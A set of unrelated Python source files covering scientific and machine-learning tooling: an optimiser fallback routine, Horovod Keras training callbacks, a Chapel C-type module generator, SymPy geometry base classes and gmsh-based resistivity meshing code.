kwds = {
"args": args,
"disp": False,
"maxfun": np.inf,
"maxiter": np.inf,
}
# Keywords specific to BFGS (and default values).
bfgs_terms = {
"m": p0.size,
"factr": 10.0,
"pgtol": 1e-6,
}
bfgs_terms.update(kwargs.pop("op_bfgs_kwargs", {}))
kwds.update(bfgs_terms)
logger.debug("BFGS keywords: {}".format(kwds))
op_params, fopt, d = op.fmin_l_bfgs_b(
func, p0, fprime=None, approx_grad=False, **kwds)
metadata = {
"bfgs_fopt": fopt,
"bfgs_dict": d
}
if d["warnflag"] > 0:
# Run Powell's method instead.
# Default values:
kwds.update({
"xtol": 1e-6,
"ftol": 1e-6
})
kwds.update(kwargs.get("op_fmin_kwargs", {}))
for k in bfgs_terms:
del kwds[k]
# Add 'False' to args so that we don't return gradient because fmin does
# not want it.
kwds["args"] = tuple(list(kwds["args"]) + [False])
logger.debug("fmin_powell keywords: {}".format(kwds))
op_params, fopt, direc, n_iter, n_funcs, warnflag = op.fmin_powell(
func, op_params, full_output=True, **kwds)
if warnflag > 0:
logger.warning("""
BFGS stopped prematurely:
{0}
And then Powell optimization failed:
{1}
""".format(d["task"], [
"MAXIMUM NUMBER OF FUNCTION EVALUATIONS.",
"MAXIMUM NUMBER OF ITERATIONS."
][warnflag - 1]))
metadata.update({
"fmin_fopt": fopt,
"fmin_niter": n_iter,
"fmin_nfuncs": n_funcs,
"fmin_warnflag": warnflag
})
# De-censor the optimized parameters!
labels = np.zeros(censoring_mask.size)
labels[censoring_mask] = op_params
result = np.hstack([labels, initial_s2]) if fixed_scatter else labels
return (result, metadata)
|
|
import keras
import keras.backend as K
import tensorflow as tf
import horovod.tensorflow as hvd
class BroadcastGlobalVariablesCallback(keras.callbacks.Callback):
"""
Keras Callback that will broadcast all global variables from root rank
to all other processes during initialization.
This is necessary to ensure consistent initialization of all workers when
training is started with random weights or restored from a checkpoint.
"""
def __init__(self, root_rank, device=''):
"""
Construct a new BroadcastGlobalVariablesCallback that will broadcast all
global variables from root rank to all other processes during initialization.
Args:
root_rank: Rank that will send data, other ranks will receive data.
device: Device to be used for broadcasting. Uses GPU by default
if Horovod was build with HOROVOD_GPU_BROADCAST.
"""
super(BroadcastGlobalVariablesCallback, self).__init__()
self.root_rank = root_rank
self.device = device
def on_train_begin(self, logs=None):
with tf.device(self.device):
bcast_op = hvd.broadcast_global_variables(self.root_rank)
K.get_session().run(bcast_op)
class MetricAverageCallback(keras.callbacks.Callback):
"""
Keras Callback that will average metrics across all processes at the
end of the epoch. Useful in conjuction with ReduceLROnPlateau,
TensorBoard and other metrics-based callbacks.
Note: This callback must be added to the callback list before the
ReduceLROnPlateau, TensorBoard or other metrics-based callbacks.
"""
def __init__(self, device=''):
"""
Construct a new MetricAverageCallback that will average metrics
across all processes at the end of the epoch.
Args:
device: Device to be used for allreduce. Uses GPU by default
if Horovod was build with HOROVOD_GPU_ALLREDUCE.
"""
super(MetricAverageCallback, self).__init__()
self.variables = {}
self.allreduce_ops = {}
self.device = device
def _make_variable(self, metric, value):
with tf.name_scope('MetricAverageCallback'):
var = tf.Variable(value, name=metric)
K.get_session().run(var.initializer)
allreduce_op = hvd.allreduce(var, device_dense=self.device)
return var, allreduce_op
def _average_metrics_in_place(self, logs):
logs = logs or {}
reduced_logs = {}
# Reduce every metric among workers. Sort metrics by name
# to ensure consistent order.
for metric, value in sorted(logs.items()):
if metric not in self.variables:
self.variables[metric], self.allreduce_ops[metric] = \
self._make_variable(metric, value)
else:
K.set_value(self.variables[metric], value)
reduced_logs[metric] = \
K.get_session().run(self.allreduce_ops[metric])
# Override the reduced values back into logs dictionary
# for other callbacks to use.
for metric, value in reduced_logs.items():
logs[metric] = value
def on_epoch_end(self, epoch, logs=None):
self._average_metrics_in_place(logs)
class LearningRateScheduleCallback(keras.callbacks.Callback):
"""
LearningRateScheduleCallback sets learning rate between epochs `start_epoch` and
`end_epoch` to be `initial_lr * multiplier`. `multiplier` can be a constant or
a function `f(epoch) = lr'`.
If `multiplier` is a function and `staircase=True`, learning rate adjustment will
happen at the beginning of each epoch and the epoch passed to the `multiplier`
function will be an integer.
If `multiplier` is a function and `staircase=False`, learning rate adjustment will
happen at the beginning of each batch and the epoch passed to the `multiplier`
function will be a floating number: `epoch' = epoch + batch / steps_per_epoch`.
This functionality is useful for smooth learning rate adjustment schedulers, such
as `LearningRateWarmupCallback`.
`initial_lr` is the learning rate of the model optimizer at the start of the training.
"""
def __init__(self, multiplier, start_epoch=0, end_epoch=None, staircase=True,
momentum_correction=True, steps_per_epoch=None):
"""
Construct a new LearningRateScheduleCallback.
Args:
multiplier: A constant multiplier or a function `f(epoch) = lr'`
start_epoch: The first epoch this adjustment will be applied to. Defaults to 0.
end_epoch: The epoch this adjustment will stop applying (exclusive end).
Defaults to None.
staircase: Whether to adjust learning rate at the start of epoch (`staircase=True`)
or at the start of every batch (`staircase=False`).
momentum_correction: Apply momentum correction to optimizers that have momentum.
Defaults to True.
steps_per_epoch: The callback will attempt to autodetect number of batches per
epoch with Keras >= 2.0.0. Provide this value if you have an older
version of Keras.
"""
super(LearningRateScheduleCallback, self).__init__()
self.start_epoch = start_epoch
self.end_epoch = end_epoch
self.staircase = staircase
self.momentum_correction = momentum_correction
self.initial_lr = None
self.restore_momentum = None
self.steps_per_epoch = steps_per_epoch
self.current_epoch = None
if not callable(multiplier):
self.staircase = True
self.multiplier = lambda epoch: multiplier
else:
self.multiplier = multiplier
def _autodetect_steps_per_epoch(self):
if self.params.get('steps'):
# The number of steps is provided in the parameters.
return self.params['steps']
elif self.params.get('samples') and self.params.get('batch_size'):
# Compute the number of steps per epoch using # of samples and a batch size.
return self.params['samples'] // self.params['batch_size']
else:
raise ValueError('Could not autodetect the number of steps per epoch. '
'Please specify the steps_per_epoch parameter to the '
'%s() or upgrade to the latest version of Keras.'
% self.__class__.__name__)
def _adjust_learning_rate(self, epoch):
old_lr = K.get_value(self.model.optimizer.lr)
new_lr = self.initial_lr * self.multiplier(epoch)
K.set_value(self.model.optimizer.lr, new_lr)
if hasattr(self.model.optimizer, 'momentum') and self.momentum_correction:
# See the paper cited above for more information about momentum correction.
self.restore_momentum = K.get_value(self.model.optimizer.momentum)
K.set_value(self.model.optimizer.momentum,
self.restore_momentum * new_lr / old_lr)
def _restore_momentum_if_needed(self):
if self.restore_momentum:
K.set_value(self.model.optimizer.momentum, self.restore_momentum)
self.restore_momentum = None
def on_train_begin(self, logs=None):
self.initial_lr = K.get_value(self.model.optimizer.lr)
if not self.staircase and not self.steps_per_epoch:
self.steps_per_epoch = self._autodetect_steps_per_epoch()
def on_epoch_begin(self, epoch, logs=None):
self.current_epoch = epoch
def on_batch_begin(self, batch, logs=None):
if (self.current_epoch < self.start_epoch or
(self.end_epoch is not None and self.current_epoch >= self.end_epoch)):
# Outside of the adjustment scope.
return
if self.staircase and batch == 0:
# Do on first batch of every epoch.
self._adjust_learning_rate(self.current_epoch)
elif not self.staircase:
epoch = self.current_epoch + float(batch) / self.steps_per_epoch
self._adjust_learning_rate(epoch)
def on_batch_end(self, batch, logs=None):
self._restore_momentum_if_needed()
def on_epoch_end(self, epoch, logs=None):
if logs is not None:
# Log current learning rate.
logs['lr'] = K.get_value(self.model.optimizer.lr)
class LearningRateWarmupCallback(LearningRateScheduleCallback):
"""
Implements gradual learning rate warmup:
`lr = initial_lr / hvd.size()` ---> `lr = initial_lr`
`initial_lr` is the learning rate of the model optimizer at the start of the training.
This technique was described in the paper "Accurate, Large Minibatch SGD: Training
ImageNet in 1 Hour". See https://arxiv.org/pdf/1706.02677.pdf for details.
Math recap:
batch
epoch = full_epochs + ---------------
steps_per_epoch
lr size - 1
lr'(epoch) = ---- * (-------- * epoch + 1)
size warmup
lr
lr'(epoch = 0) = ----
size
lr'(epoch = warmup) = lr
"""
def __init__(self, warmup_epochs=5, momentum_correction=True, steps_per_epoch=None,
verbose=0):
"""
Construct a new LearningRateWarmupCallback that will gradually warm up the learning rate.
Args:
warmup_epochs: The number of epochs of the warmup phase. Defaults to 5.
momentum_correction: Apply momentum correction to optimizers that have momentum.
Defaults to True.
steps_per_epoch: The callback will attempt to autodetect number of batches per
epoch with Keras >= 2.0.0. Provide this value if you have an older
version of Keras.
verbose: verbosity mode, 0 or 1.
"""
def multiplier(epoch):
# Adjust epoch to produce round numbers at the end of each epoch, so that TensorBoard
# learning rate graphs look better.
epoch += 1. / self.steps_per_epoch
return 1. / hvd.size() * (epoch * (hvd.size() - 1) / warmup_epochs + 1)
self.verbose = verbose
super(LearningRateWarmupCallback, self).__init__(
multiplier, start_epoch=0, end_epoch=warmup_epochs, staircase=False,
momentum_correction=momentum_correction, steps_per_epoch=steps_per_epoch)
def on_epoch_end(self, epoch, logs=None):
super(LearningRateWarmupCallback, self).on_epoch_end(epoch, logs)
if epoch == self.end_epoch - 1 and self.verbose > 0:
new_lr = K.get_value(self.model.optimizer.lr)
print('\nEpoch %d: finished gradual learning rate warmup to %g.' %
(epoch + 1, new_lr))
|
|
#!/usr/bin/env python
"""Build SysCTypes.chpl module.
Determines the size of various C types (e.g. long, size_t, etc) and creates a
Chapel module with 'extern types' declaration so Chapel code can refer to the
types.
Specify the output file as a positional argument, e.g.:
%prog path/to/SysCTypes.chpl
"""
from __future__ import print_function
import contextlib
import logging
import optparse
import os
import os.path
import re
import sys
# List of C types. The items in each element are:
#
# * C macro for maximum value for type
# * Name of Chapel type
# * Name of C type
_types = [
('INT_MAX', 'c_int', 'int'),
('UINT_MAX', 'c_uint', 'uint'),
('LONG_MAX', 'c_long', 'long'),
('ULONG_MAX', 'c_ulong', 'unsigned long'),
('LLONG_MAX', 'c_longlong', 'long long'),
('ULLONG_MAX', 'c_ulonglong', 'unsigned long long'),
('CHAR_MAX', 'c_char', 'char'),
('SCHAR_MAX', 'c_schar', 'signed char'),
('UCHAR_MAX', 'c_uchar', 'unsigned char'),
('SHRT_MAX', 'c_short', 'short'),
('USHRT_MAX', 'c_ushort', 'unsigned short'),
('INTPTR_MAX', 'c_intptr', 'intptr_t'),
('UINTPTR_MAX', 'c_uintptr', 'uintptr_t'),
('PTRDIFF_MAX', 'c_ptrdiff', 'ptrdiff_t'),
('SSIZE_MAX', 'ssize_t', 'ssize_t'),
('SIZE_MAX', 'size_t', 'size_t'),
]
# Map of max values to chapel types.
_max_value_to_chpl_type = {
'127': 'int(8)',
'255': 'uint(8)',
'32767': 'int(16)',
'65535': 'uint(16)',
'2147483647': 'int(32)',
'4294967295': 'uint(32)',
'9223372036854775807': 'int(64)',
'18446744073709551615': 'uint(64)',
}
_h_file_header = """
#include "sys_basic.h"
#include <limits.h>
#include <stdint.h>
#include <math.h>
FIND_INT_SIZES_START
"""
def main():
"""Parse command line arguments, create module, and print to stdout."""
args = _parse_args()
_setup_logging(args.verbose)
# Get the module content first, since it can lead to errors/early exits if
# something goes wrong.
module_content = get_sys_c_types(args.doc)
with open(args.output_file, 'w') as fp:
fp.write(module_content)
fp.write('\n')
logging.debug('Wrote module to: {0}'.format(args.output_file))
def get_sys_c_types(docs=False):
"""Returns a string with the SysCTypes.chpl module content."""
# Find the $CHPL_HOME/util/config/ dir.
util_cfg_dir = os.path.abspath(os.path.dirname(__file__))
logging.debug('Util config dir: {0}'.format(util_cfg_dir))
# Get the C compile line.
compileline_cmd = os.path.join(util_cfg_dir, 'compileline')
cmd = '{compileline_cmd} --compile'.format(**locals())
compileline = os.popen(cmd).read().strip()
logging.debug('Compile line: {0}'.format(compileline))
# Create temp header file with *_MAX macros, then run it through the C
# preprocessor using the C compile line found above.
h_file = 'find_int_sizes_tmp.h'
with _ensure_deleted(h_file):
logging.debug('Creating temp header: {0}'.format(h_file))
with open(h_file, 'w') as fp:
fp.write(_h_file_header)
for max_macro, _, _ in _types:
fp.write('{0}\n'.format(max_macro))
logging.debug('Wrote {0} max types to {1}'.format(len(_types), h_file))
compile_cmd = '{compileline} -E {h_file}'.format(**locals())
logging.debug('Preprocessor command: {0}'.format(compile_cmd))
compile_result = os.popen(compile_cmd).read()
logging.debug('Captured preprocessor output with {0} '
'characters.'.format(len(compile_result)))
# Iterate through the preprocessor output, find the max value expressions,
# and record them in a list.
max_exprs = []
keep = False
for line in compile_result.splitlines():
# Skip lines until the start macro is found.
if not keep and 'FIND_INT_SIZES_START' not in line:
continue
# Found the start of the max macros. All subsequent lines will be
# recorded.
elif 'FIND_INT_SIZES_START' in line:
keep = True
# Ignore lines starting with # since they could be #line
# type directives.
elif line.strip().startswith("#"):
continue
# Ignore blank lines
elif line.strip() == '':
continue
# The start of the max macros has already been found. Record every
# line, stripping it of whitespace.
else:
max_exprs.append(line.strip())
logging.debug('Found {0} lines of max type '
'values.'.format(len(max_exprs)))
if len(max_exprs) != len(_types):
logging.error('Found {0} max values, but {1} types were '
'expected.'.format(len(max_exprs), len(_types)))
sys.exit(1)
# Iterate through the max value expressions, evaluate each one, and store
# it in a list. Python deals with arbitrarily large integers, so there is
# no fear of overflow.
replace_pattern = re.compile(r'[UL]', re.IGNORECASE)
max_values = []
for expr in max_exprs:
ex = re.sub(replace_pattern, '', expr)
value = eval(ex)
logging.debug('{0} -> {1}'.format(expr, value))
max_values.append(value)
logging.debug('Evaluated all {0} expressions from '
'preprocessor.'.format(len(max_values)))
# Iterate through the chapel types/max values and print out the SysCTypes
# Chapel module code. Each line takes the form "extern type <chpl_type>=
# <chpl_value>;" where <chpl_value> is found by looking up the max value
# (from evaluated expression above) in the _max_value_to_chpl_type map.
sys_c_types = []
handled_c_ptr = False
for i, max_value in enumerate(max_values):
max_macro, chpl_type, c_type = _types[i]
chpl_value = _max_value_to_chpl_type.get(str(max_value))
if chpl_value is None:
logging.error('Unknown numeric limit {0} in '
'_max_value_to_chpl_type dict.'.format(max_value))
sys.exit(1)
sys_c_types.append('/* The type corresponding to the C {c_type} type'
' */'.format(**locals()))
stmt = 'extern type {chpl_type}= '.format(**locals())
if docs:
stmt += 'integral'
else:
stmt += chpl_value
stmt += ';'
sys_c_types.append(stmt)
if chpl_type == 'c_ptr':
handled_c_ptr = True
if not handled_c_ptr:
sys_c_types.append('extern type c_void_ptr; '
'// opaque; no ptr arithmetic in Chapel code!')
# Finally, print out set of asserts for module. They assert that the
# sizeof(<extern chpl type>) matches the sizeof(<chpl type>). E.g.
#
# assert(sizeof(c_int) == sizeof(int(32)));
#
sys_c_types.append("""
{
pragma "no prototype"
extern proc sizeof(type t): size_t;
""")
for i, max_value in enumerate(max_values):
_, chpl_type, _ = _types[i]
chpl_value = _max_value_to_chpl_type.get(str(max_value))
sys_c_types.append(' assert(sizeof({chpl_type}) == sizeof({chpl_value}))'
';'.format(**locals()))
sys_c_types.append('}')
return '\n'.join(sys_c_types)
@contextlib.contextmanager
def _ensure_deleted(filename):
"""Ensure file is deleted after context manager."""
try:
yield
finally:
if os.path.exists(filename):
logging.debug('Deleting: {0}'.format(filename))
os.unlink(filename)
def _parse_args():
"""Parse and return command line args."""
class NoWrapHelpFormatter(optparse.IndentedHelpFormatter):
"""Help formatter that does not wrap the description text."""
def _format_text(self, text):
return text
parser = optparse.OptionParser(
usage='usage: %prog [--doc] [--verbose] <SysCTypes_filename>',
description=__doc__,
formatter=NoWrapHelpFormatter()
)
parser.add_option(
'-v', '--verbose', action='store_true',
help='Enable verbose output.'
)
parser.add_option(
'--doc', action='store_true',
help='Build SysCTypes module for chpldoc.'
)
opts, args = parser.parse_args()
if len(args) != 1:
parser.print_help()
sys.exit(1)
else:
opts.output_file = args[0]
return opts
def _setup_logging(verbose=False):
"""Initialize logging and set level based on verbose.
:type verbose: bool
:arg verbose: When True, set log level to DEBUG.
"""
log_level = logging.DEBUG if verbose else logging.WARNING
logging.basicConfig(format='%(levelname)s: %(message)s',
level=log_level)
logging.debug('Verbose output enabled.')
if __name__ == '__main__':
main()
|
|
"""The definition of the base geometrical entity with attributes common to
all derived geometrical entities.
Contains
========
GeometryEntity
"""
from __future__ import print_function, division
from sympy.core.compatibility import is_sequence
from sympy.core.containers import Tuple
from sympy.core.basic import Basic
from sympy.core.sympify import sympify
from sympy.functions import cos, sin
from sympy.matrices import eye
# How entities are ordered; used by __cmp__ in GeometryEntity
ordering_of_classes = [
"Point",
"Point3D",
"Segment",
"Ray",
"Line",
"Line3D",
"Ray3D",
"Segment3D",
"Plane",
"Triangle",
"RegularPolygon",
"Polygon",
"Circle",
"Ellipse",
"Curve"
]
class GeometryEntity(Basic):
"""The base class for all geometrical entities.
This class doesn't represent any particular geometric entity, it only
provides the implementation of some methods common to all subclasses.
"""
def __new__(cls, *args, **kwargs):
args = [Tuple(*a) if is_sequence(a) else sympify(a) for a in args]
return Basic.__new__(cls, *args)
def _sympy_(self):
return self
def __getnewargs__(self):
return tuple(self.args)
def intersection(self, o):
"""
Returns a list of all of the intersections of self with o.
Notes
=====
An entity is not required to implement this method.
If two different types of entities can intersect, the item with
higher index in ordering_of_classes should implement
intersections with anything having a lower index.
See Also
========
sympy.geometry.util.intersection
"""
raise NotImplementedError()
def rotate(self, angle, pt=None):
"""Rotate ``angle`` radians counterclockwise about Point ``pt``.
The default pt is the origin, Point(0, 0)
See Also
========
scale, translate
Examples
========
>>> from sympy import Point, RegularPolygon, Polygon, pi
>>> t = Polygon(*RegularPolygon(Point(0, 0), 1, 3).vertices)
>>> t # vertex on x axis
Triangle(Point(1, 0), Point(-1/2, sqrt(3)/2), Point(-1/2, -sqrt(3)/2))
>>> t.rotate(pi/2) # vertex on y axis now
Triangle(Point(0, 1), Point(-sqrt(3)/2, -1/2), Point(sqrt(3)/2, -1/2))
"""
newargs = []
for a in self.args:
if isinstance(a, GeometryEntity):
newargs.append(a.rotate(angle, pt))
else:
newargs.append(a)
return type(self)(*newargs)
def scale(self, x=1, y=1, pt=None):
"""Scale the object by multiplying the x,y-coordinates by x and y.
If pt is given, the scaling is done relative to that point; the
object is shifted by -pt, scaled, and shifted by pt.
See Also
========
rotate, translate
Examples
========
>>> from sympy import RegularPolygon, Point, Polygon
>>> t = Polygon(*RegularPolygon(Point(0, 0), 1, 3).vertices)
>>> t
Triangle(Point(1, 0), Point(-1/2, sqrt(3)/2), Point(-1/2, -sqrt(3)/2))
>>> t.scale(2)
Triangle(Point(2, 0), Point(-1, sqrt(3)/2), Point(-1, -sqrt(3)/2))
>>> t.scale(2,2)
Triangle(Point(2, 0), Point(-1, sqrt(3)), Point(-1, -sqrt(3)))
"""
from sympy.geometry.point import Point
if pt:
pt = Point(pt)
return self.translate(*(-pt).args).scale(x, y).translate(*pt.args)
return type(self)(*[a.scale(x, y) for a in self.args]) # if this fails, override this class
def translate(self, x=0, y=0):
"""Shift the object by adding to the x,y-coordinates the values x and y.
See Also
========
rotate, scale
Examples
========
>>> from sympy import RegularPolygon, Point, Polygon
>>> t = Polygon(*RegularPolygon(Point(0, 0), 1, 3).vertices)
>>> t
Triangle(Point(1, 0), Point(-1/2, sqrt(3)/2), Point(-1/2, -sqrt(3)/2))
>>> t.translate(2)
Triangle(Point(3, 0), Point(3/2, sqrt(3)/2), Point(3/2, -sqrt(3)/2))
>>> t.translate(2, 2)
Triangle(Point(3, 2), Point(3/2, sqrt(3)/2 + 2),
Point(3/2, -sqrt(3)/2 + 2))
"""
newargs = []
for a in self.args:
if isinstance(a, GeometryEntity):
newargs.append(a.translate(x, y))
else:
newargs.append(a)
return self.func(*newargs)
def reflect(self, line):
from sympy import atan, Point, Dummy, oo
g = self
l = line
o = Point(0, 0)
if l.slope == 0:
y = l.args[0].y
if not y: # x-axis
return g.scale(y=-1)
reps = [(p, p.translate(y=2*(y - p.y))) for p in g.atoms(Point)]
elif l.slope == oo:
x = l.args[0].x
if not x: # y-axis
return g.scale(x=-1)
reps = [(p, p.translate(x=2*(x - p.x))) for p in g.atoms(Point)]
else:
if not hasattr(g, 'reflect') and not all(
isinstance(arg, Point) for arg in g.args):
raise NotImplementedError(
'reflect undefined or non-Point args in %s' % g)
a = atan(l.slope)
c = l.coefficients
d = -c[-1]/c[1] # y-intercept
# apply the transform to a single point
x, y = Dummy(), Dummy()
xf = Point(x, y)
xf = xf.translate(y=-d).rotate(-a, o).scale(y=-1
).rotate(a, o).translate(y=d)
# replace every point using that transform
reps = [(p, xf.xreplace({x: p.x, y: p.y})) for p in g.atoms(Point)]
return g.xreplace(dict(reps))
def encloses(self, o):
"""
Return True if o is inside (not on or outside) the boundaries of self.
The object will be decomposed into Points and individual Entities need
only define an encloses_point method for their class.
See Also
========
sympy.geometry.ellipse.Ellipse.encloses_point
sympy.geometry.polygon.Polygon.encloses_point
Examples
========
>>> from sympy import RegularPolygon, Point, Polygon
>>> t = Polygon(*RegularPolygon(Point(0, 0), 1, 3).vertices)
>>> t2 = Polygon(*RegularPolygon(Point(0, 0), 2, 3).vertices)
>>> t2.encloses(t)
True
>>> t.encloses(t2)
False
"""
from sympy.geometry.point import Point
from sympy.geometry.line import Segment, Ray, Line
from sympy.geometry.ellipse import Ellipse
from sympy.geometry.polygon import Polygon, RegularPolygon
if isinstance(o, Point):
return self.encloses_point(o)
elif isinstance(o, Segment):
return all(self.encloses_point(x) for x in o.points)
elif isinstance(o, Ray) or isinstance(o, Line):
return False
elif isinstance(o, Ellipse):
return self.encloses_point(o.center) and not self.intersection(o)
elif isinstance(o, Polygon):
if isinstance(o, RegularPolygon):
if not self.encloses_point(o.center):
return False
return all(self.encloses_point(v) for v in o.vertices)
raise NotImplementedError()
def is_similar(self, other):
"""Is this geometrical entity similar to another geometrical entity?
Two entities are similar if a uniform scaling (enlarging or
shrinking) of one of the entities will allow one to obtain the other.
Notes
=====
This method is not intended to be used directly but rather
through the `are_similar` function found in util.py.
An entity is not required to implement this method.
If two different types of entities can be similar, it is only
required that one of them be able to determine this.
See Also
========
scale
"""
raise NotImplementedError()
def equals(self, o):
return self == o
def __ne__(self, o):
"""Test inequality of two geometrical entities."""
return not self.__eq__(o)
def __radd__(self, a):
return a.__add__(self)
def __rsub__(self, a):
return a.__sub__(self)
def __rmul__(self, a):
return a.__mul__(self)
def __rdiv__(self, a):
return a.__div__(self)
def __str__(self):
"""String representation of a GeometryEntity."""
from sympy.printing import sstr
return type(self).__name__ + sstr(self.args)
def __repr__(self):
"""String representation of a GeometryEntity that can be evaluated
by sympy."""
return type(self).__name__ + repr(self.args)
def __cmp__(self, other):
"""Comparison of two GeometryEntities."""
n1 = self.__class__.__name__
n2 = other.__class__.__name__
c = (n1 > n2) - (n1 < n2)
if not c:
return 0
i1 = -1
for cls in self.__class__.__mro__:
try:
i1 = ordering_of_classes.index(cls.__name__)
break
except ValueError:
i1 = -1
if i1 == -1:
return c
i2 = -1
for cls in other.__class__.__mro__:
try:
i2 = ordering_of_classes.index(cls.__name__)
break
except ValueError:
i2 = -1
if i2 == -1:
return c
return (i1 > i2) - (i1 < i2)
def __contains__(self, other):
"""Subclasses should implement this method for anything more complex than equality."""
if type(self) == type(other):
return self == other
raise NotImplementedError()
def _eval_subs(self, old, new):
from sympy.geometry.point import Point
from sympy.geometry.point3d import Point3D
if is_sequence(old) or is_sequence(new):
if isinstance(self, Point3D):
old = Point3D(old)
new = Point3D(new)
else:
old = Point(old)
new = Point(new)
return self._subs(old, new)
def translate(x, y):
"""Return the matrix to translate a 2-D point by x and y."""
rv = eye(3)
rv[2, 0] = x
rv[2, 1] = y
return rv
def scale(x, y, pt=None):
"""Return the matrix to multiply a 2-D point's coordinates by x and y.
If pt is given, the scaling is done relative to that point."""
rv = eye(3)
rv[0, 0] = x
rv[1, 1] = y
if pt:
from sympy.geometry.point import Point
pt = Point(pt)
tr1 = translate(*(-pt).args)
tr2 = translate(*pt.args)
return tr1*rv*tr2
return rv
def rotate(th):
"""Return the matrix to rotate a 2-D point about the origin by ``angle``.
The angle is measured in radians. To Point a point about a point other
then the origin, translate the Point, do the rotation, and
translate it back:
>>> from sympy.geometry.entity import rotate, translate
>>> from sympy import Point, pi
>>> rot_about_11 = translate(-1, -1)*rotate(pi/2)*translate(1, 1)
>>> Point(1, 1).transform(rot_about_11)
Point(1, 1)
>>> Point(0, 0).transform(rot_about_11)
Point(2, 0)
"""
s = sin(th)
rv = eye(3)*cos(th)
rv[0, 1] = s
rv[1, 0] = -s
rv[2, 2] = 1
return rv
|
|
# -*- coding: utf-8 -*-
"""
Created on Fri Mar 31 09:50:23 2017
@author: kbefus
"""
from __future__ import print_function
import numpy as np
import time, os
from pyres import pyres_utils,mesh_utils
class meshR3(object):
def __init__(self,geom_dict=None,name=None,nelectrodes_per_line=None,
nlines=None):
self.name = name
self.nelectrodes_per_line = nelectrodes_per_line
self.nlines = nlines
def make_points(self, line_strexyz=None, clen=0.1,start_pts=1):
'''Make point dictionary.'''
if line_strexyz is None:
# Make line data using default line settings
self.make_strxyz()
else:
self.line_strexyz = line_strexyz
if not hasattr(self,'points'):
self.points = {}
mesh_utils.make_points(self,clen,start_pts,ndim=3)
def make_lines(self,start_lines=1):
mesh_utils.make_lines(self,start_lines)
def make_boundaries(self,nforeground=4,nbackground=4):
'''Make boundaries from survey bounds.
Can eventually add capability to define non-square boundaries
'''
mesh_utils.make_boundaries(self,nforeground,nbackground)
def make_surfaces(self):
mesh_utils.make_surfaces(self,ndim=3)
def make_regions(self, region_xyzpts=None, extend_to=None,
clen=None, boundary_dict=None,region_fname=None,load_dict=None,
outside_foreground=False,active_domain='foreground'):
'''Create geometry components for assigning model region.'''
def write_geo(self,out_fname=None,boundary_dict=None,extrude_dict=None,ndigits=2):
'''Write .geo file.
'''
gmsh_geo_dict = {'gmsh_obj':self,'out_fname':out_fname,
'boundary_dict':boundary_dict,
'extrude_dict':extrude_dict,
'ndigits':ndigits}
write_gmsh_geo(**gmsh_geo_dict)
self.geo_name = out_fname
def run_gmsh(self,silent=True,report=True,
gmshdir = r'D:\Research\Software\gmsh-2.16.0-Windows',
gmshexe = 'gmsh.exe',optimize=False, num_quad_lloyd_steps=0, dim=3,
normal_msg = 'stopped on'):
'''Run gmsh executable.
Source: after https://github.com/nschloe/pygmsh/blob/master/pygmsh/helper.py#generate_mesh
'''
cwd = os.path.dirname(self.geo_name)
cmd_list = [os.path.join(gmshdir,gmshexe), '-{0:d}'.format(dim), self.geo_name, '-o', self.msh_name]
if optimize:
cmd_list += ['-optimize']
if num_quad_lloyd_steps > 0:
cmd_list += ['-optimize_lloyd', str(num_quad_lloyd_steps)]
run_dict = {'cmd_list':cmd_list,'cwd':cwd,'silent':silent,
'normal_msg':normal_msg,'report':report}
self.success,self.buff = pyres_utils.run_cmd(**run_dict)
def locate_inf_electrode(self,inf_electrode_xy=[None,None],
msh_name=None):
'''Find mesh node of inf electrode(s).'''
if hasattr(self,'msh_name'):
# Load .msh file
msh_dict = read_gmsh(msh_fname=self.msh_name)
elif msh_name is not None:
msh_dict = read_gmsh(msh_fname=msh_name)
else:
print("msh_name needs to be assigned.")
# Find closest node to infinity electrode
# 1) Try to find perfect match
match_inds = pyres_utils.match_xy(XY=msh_dict['nodes'][:,0:2],
xy_to_match = np.array(inf_electrode_xy))
if len(match_inds)<1.:
dist_array = np.sqrt((inf_electrode_xy[0]-msh_dict['nodes'][:,0])**2.+\
(inf_electrode_xy[1]-msh_dict['nodes'][:,1])**2.)
match_ind = np.argmin(dist_array)+1 # account for 1-based indexing
return match_ind,msh_dict['nodes'][match_ind,:]
def msh_to_dat(self,msh_fname=None,out_file='mesh3d.dat', topo_correct=False,
topo_dict=None, overwrite=True, verbose=False, job_type=1,
alpha_scale=1.):
'''Convert .msh to .dat for R3.'''
if msh_fname is None:
msh_fname = self.msh_name
gmsh_to_R3_dict= {'msh_fname':msh_fname,'out_file':out_file,
'topo_correct':topo_correct,'topo_dict':topo_dict,
'overwrite':overwrite,'verbose':verbose,
'job_type':job_type,'alpha_scale':alpha_scale}
self.gmsh_to_R3_msg,self.nregions, self.mesh_dict,self.topo_xyz = gmsh_to_R3(**gmsh_to_R3_dict)
def make_mesh(self,geom_dict=None,write_dict=None,
run_gmsh=False, gmsh_dict=None,region_dict=None):
'''Run individual functions to make mesh.
'''
self.make_points(**geom_dict)
self.make_lines()
self.make_boundaries()
self.make_surfaces()
if region_dict is not None:
self.make_regions(**region_dict)
write_dict.update({'region_dict':region_dict})
self.write_geo(**write_dict)
if run_gmsh:
self.msh_name = "{}.msh".format(os.path.splitext(self.geo_name)[0])
if gmsh_dict is None:
self.run_gmsh()
else:
self.run_gmsh(**gmsh_dict)
class meshR2(object):
def __init__(self,geom_dict=None,name=None,nelectrodes_per_line=None,
nlines=1,electrode_spacing=None):
self.name = name
self.nelectrodes_per_line = nelectrodes_per_line
self.nlines = nlines
self.electrode_spacing = electrode_spacing
def make_strxyz(self):
'''Make 2D line string, electrode number, x, y, z array.
Note: Assumes all electrodes at surface (z=0) and are on the
y-axis (y=0).
'''
self.line_strexyz = np.array([np.hstack([np.ones((self.nelectrodes_per_line,1)),
np.arange(self.nelectrodes_per_line).reshape([-1,1]),
self.electrode_spacing*np.arange(self.nelectrodes_per_line).reshape([-1,1]),
np.zeros((self.nelectrodes_per_line,1)),
np.zeros((self.nelectrodes_per_line,1))])])
def make_points(self, line_strexyz=None, clen=0.1,start_pts=1):
'''Make point dictionary.'''
if line_strexyz is None:
# Make line data using default line settings
self.make_strxyz()
else:
self.line_strexyz = line_strexyz
if not hasattr(self,'points'):
self.points = {}
elec_list = []
iline_order = []
for iline in np.arange(self.line_strexyz.shape[0]):
if iline not in self.points.keys():
self.points[iline] = {}
iline_order.append(iline)
key_order = []
for linestr,enum,x,y,z in self.line_strexyz[iline]:
self.points[iline].update({start_pts:[x,y,z,clen]})
key_order.append(start_pts)
elec_list.append([enum,start_pts]) # save data for protocol.dat
start_pts+=1
self.points[iline].update({'order':key_order})
self.points.update({'order':iline_order})
self.count_pts = start_pts
